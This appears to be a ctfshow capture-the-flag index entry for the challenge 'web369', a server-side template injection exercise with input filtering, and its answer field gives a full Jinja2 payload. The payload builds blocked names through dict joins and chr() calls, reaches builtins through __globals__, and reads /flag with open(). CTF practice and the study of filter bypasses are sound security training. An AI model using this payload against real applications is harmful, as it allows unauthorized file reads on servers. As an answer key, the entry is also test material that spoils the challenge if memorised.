web369
| ID: | 3670 |
|---|---|
| 标题: | web369 |
| 描述: | * 此题为 【从0开始学web】系列第三百六十九题 * 此系列题目从最基础开始,题目遵循循序渐进的原则 ``` 开始过滤 ``` |
| 类型: | WEB入门.SSTI |
| 网站: | ctfshow |
| 题目链接: | https://ctf.show/api/v1/challenges/853 |
| 赛事: | SSTI |
| 年度: | None |
| Flag值: | ctfshow平台WEB入门.SSTI题目web369的解题答案为: ?name={% set po=dict(po=a,p=a) |
| writeup: |
join%}{% set a=(() select string list) attr(po)(24)%}{% set ini=(a,a,dict(init=a) join,a,a) join()%}{% set glo=(a,a,dict(globals=a) join,a,a) join()%}{% set geti=(a,a,dict(getitem=a) join,a,a) join()%}{% set built=(a,a,dict(builtins=a) join,a,a) join()%}{% set x=(q attr(ini) attr(glo) attr(geti))(built)%}{% set chr=x.chr%}{% set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%}{%print(x.open(file).read())%} https://blog.csdn.net/m0_62094846/article/details/124601894 |